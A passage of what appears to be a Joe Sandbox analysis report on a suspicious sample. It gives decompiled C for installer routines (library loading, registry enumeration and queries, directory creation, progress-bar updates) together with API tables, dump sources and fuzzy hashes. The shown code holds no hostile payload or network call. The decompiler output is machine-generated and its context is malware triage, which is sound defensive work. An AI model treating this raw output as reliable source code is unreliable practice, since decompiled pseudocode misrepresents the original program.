                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID: Call
                                                                                      • API String ID: 3356406503-1824292864
                                                                                      • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                      • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                      • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                      • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 60%
                                                                                      			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x434fc0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                      0x004020d8
                                                                                      0x004020d8
                                                                                      0x004020dd
                                                                                      0x004020e4
                                                                                      0x004021a3
                                                                                      0x004022f1
                                                                                      0x004022f1
                                                                                      0x00402c2a
                                                                                      0x00402c2d
                                                                                      0x00402c39
                                                                                      0x00402c39
                                                                                      0x004020f3
                                                                                      0x004020fd
                                                                                      0x00402100
                                                                                      0x00402110
                                                                                      0x00402114
                                                                                      0x0040211a
                                                                                      0x0040211c
                                                                                      0x0040211f
                                                                                      0x0040219c
                                                                                      0x00000000
                                                                                      0x0040219c
                                                                                      0x00402121
                                                                                      0x0040212c
                                                                                      0x00402130
                                                                                      0x00402170
                                                                                      0x00402132
                                                                                      0x00402135
                                                                                      0x00402138
                                                                                      0x00402164
                                                                                      0x0040213a
                                                                                      0x0040213d
                                                                                      0x00402146
                                                                                      0x00402148
                                                                                      0x00402148
                                                                                      0x00402146
                                                                                      0x00402138
                                                                                      0x00402178
                                                                                      0x00402191
                                                                                      0x00402191
                                                                                      0x00000000
                                                                                      0x00402178
                                                                                      0x00402103
                                                                                      0x0040210b
                                                                                      0x0040210e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                        • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000,?,75A423A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                        • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000,?,75A423A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                        • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00403418), ref: 004055FA
                                                                                        • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll), ref: 0040560C
                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 334405425-0
                                                                                      • Opcode ID: 8fc0b63074c346d1d24f62ec551aba281f6c9b66b265cbc2eeb406f1c7e57b21
                                                                                      • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                                                      • Opcode Fuzzy Hash: 8fc0b63074c346d1d24f62ec551aba281f6c9b66b265cbc2eeb406f1c7e57b21
                                                                                      • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 86%
                                                                                      			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402DE6(_t29, 0x20019); // executed
				_t24 = _t9;
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x3ff); // executed
					}
					_t22[0x3ff] = _t16;
					_push(_t24);
					RegCloseKey();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}












                                                                                      0x0040259e
                                                                                      0x0040259e
                                                                                      0x0040259e
                                                                                      0x004025a3
                                                                                      0x004025aa
                                                                                      0x004025ac
                                                                                      0x004025b4
                                                                                      0x004025b7
                                                                                      0x004025ba
                                                                                      0x0040292e
                                                                                      0x004025c0
                                                                                      0x004025c8
                                                                                      0x004025cb
                                                                                      0x004025e4
                                                                                      0x004025ea
                                                                                      0x004025ec
                                                                                      0x004025ee
                                                                                      0x004025ee
                                                                                      0x004025cd
                                                                                      0x004025d1
                                                                                      0x004025d1
                                                                                      0x004025f5
                                                                                      0x004025fc
                                                                                      0x004025fd
                                                                                      0x004025fd
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso9723.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Enum$CloseValue
                                                                                      • String ID:
                                                                                      • API String ID: 397863658-0
                                                                                      • Opcode ID: eb877c1892a8007c8d5756c2053a66096deea000915ae606c9df5557c0642565
                                                                                      • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                                                      • Opcode Fuzzy Hash: eb877c1892a8007c8d5756c2053a66096deea000915ae606c9df5557c0642565
                                                                                      • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 86%
                                                                                      			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(0x441000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                                      0x004015c1
                                                                                      0x004015c9
                                                                                      0x004015cc
                                                                                      0x004015d1
                                                                                      0x004015d5
                                                                                      0x004015d7
                                                                                      0x004015df
                                                                                      0x004015e1
                                                                                      0x004015e4
                                                                                      0x004015ea
                                                                                      0x00401604
                                                                                      0x00401607
                                                                                      0x004015ec
                                                                                      0x004015ec
                                                                                      0x004015ef
                                                                                      0x00000000
                                                                                      0x004015fa
                                                                                      0x004015fd
                                                                                      0x004015fd
                                                                                      0x004015ef
                                                                                      0x0040160e
                                                                                      0x00401615
                                                                                      0x00401624
                                                                                      0x00401624
                                                                                      0x00401617
                                                                                      0x0040161a
                                                                                      0x00401622
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00401622
                                                                                      0x00401615
                                                                                      0x00401627
                                                                                      0x0040162b
                                                                                      0x0040162c
                                                                                      0x004015d7
                                                                                      0x00401634
                                                                                      0x00401663
                                                                                      0x004022f1
                                                                                      0x00401636
                                                                                      0x00401638
                                                                                      0x00401645
                                                                                      0x0040164d
                                                                                      0x00401655
                                                                                      0x0040165b
                                                                                      0x0040165b
                                                                                      0x00401655
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\,?,00405F2B,C:\,C:\,75A43420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75A43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                        • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID:
                                                                                      • API String ID: 1892508949-0
                                                                                      • Opcode ID: b33db422fb51fa5ecbdb099e32eb378baf88cce1f79279cf93775203c76b05d0
                                                                                      • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                                      • Opcode Fuzzy Hash: b33db422fb51fa5ecbdb099e32eb378baf88cce1f79279cf93775203c76b05d0
                                                                                      • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 84%
                                                                                      			E0040252A(int* __ebx, char* __edi) {
				void* _t17;
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t17 = E00402DE6(_t40, 0x20019); // executed
				_t35 = _t17;
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x800;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E00406484(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35);
					RegCloseKey();
				}
				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
				return 0;
			}








                                                                                      0x0040252a
                                                                                      0x0040252a
                                                                                      0x0040252f
                                                                                      0x00402536
                                                                                      0x00402538
                                                                                      0x0040253f
                                                                                      0x00402542
                                                                                      0x0040292e
                                                                                      0x00402548
                                                                                      0x0040254b
                                                                                      0x00402566
                                                                                      0x00402596
                                                                                      0x00402596
                                                                                      0x00402599
                                                                                      0x00402568
                                                                                      0x0040256c
                                                                                      0x00402585
                                                                                      0x0040258c
                                                                                      0x0040258f
                                                                                      0x0040256e
                                                                                      0x00402571
                                                                                      0x0040257c
                                                                                      0x004025f5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402571
                                                                                      0x0040256c
                                                                                      0x004025fc
                                                                                      0x004025fd
                                                                                      0x004025fd
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso9723.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3356406503-0
                                                                                      • Opcode ID: 43fb8dda78ad99cc5dd4f22d664c311adf40e2f39c05d722184b5c87af473be2
                                                                                      • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                                                      • Opcode Fuzzy Hash: 43fb8dda78ad99cc5dd4f22d664c311adf40e2f39c05d722184b5c87af473be2
                                                                                      • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 69%
                                                                                      			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
					}
				}
				return 0;
			}











                                                                                      0x0040138a
                                                                                      0x004013fa
                                                                                      0x0040139b
                                                                                      0x004013a0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004013a2
                                                                                      0x004013a3
                                                                                      0x004013ad
                                                                                      0x00000000
                                                                                      0x00401404
                                                                                      0x004013b0
                                                                                      0x004013b7
                                                                                      0x004013bd
                                                                                      0x004013be
                                                                                      0x004013c0
                                                                                      0x004013c2
                                                                                      0x004013b9
                                                                                      0x004013b9
                                                                                      0x004013ba
                                                                                      0x004013ba
                                                                                      0x004013c9
                                                                                      0x004013cb
                                                                                      0x004013f4
                                                                                      0x004013f4
                                                                                      0x004013c9
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                      • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                      • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                      • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: dc6c04349ba6d228002943a8c0baf5b02fcea73b120ed6c720f8467004a60d34
                                                                                      • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                                      • Opcode Fuzzy Hash: dc6c04349ba6d228002943a8c0baf5b02fcea73b120ed6c720f8467004a60d34
                                                                                      • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                                      Uniqueness

